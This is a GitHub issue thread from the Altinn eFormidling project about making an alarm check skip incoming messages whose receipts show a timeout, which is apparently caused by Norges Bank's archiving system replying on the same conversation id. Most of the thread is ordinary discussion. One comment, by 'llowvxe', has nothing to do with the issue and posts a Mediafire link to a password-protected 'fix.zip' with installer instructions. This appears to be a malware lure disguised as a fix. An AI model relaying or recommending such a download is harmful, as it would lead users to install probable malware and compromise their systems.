### ISSUE TITLE
Upgrade the alarm check to ignore incomming messages 

### ISSUE THREAD

**Issue by SandGrainOne** [Altinn/altinn-eformidling#10]
### Description

The archiving system at Norges Bank generates a respons and sends it to us as a new message using the same conversation id. This is the theory as to why we're getting incomming messages from Norges Bank.

Conclusion: We should not have alarms on this, as it is a bug outside our systems (people should not send messages in the first place). The sender will also get "failed message" in theri end.

### Additional Information

The API might already have support for filtering on incomming or outgoing messages.
[API doc](https://docs.digdir.no/docs/eFormidling/Utvikling/integrasjonspunkt_eformidling2_api_restdocs)

### Acceptance Criterias

- [x] No alarm when we find receipts with message timeout status on incomming messages 
- [x] Issues with messages being sent still trigger alarms

### Testing
This is a little tricky to test. The hope is that we can check for new LEVETID_UTLØPT receipts and cross check with the type of message as well as the time of alarms. A regression test would mean that we still correctly generate alarms for issues with messages we're sending. Is this something we can trigger?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SandGrainOne** [comment]
Checked the two alarms we had yesterday and they were triggered for the right reasons.
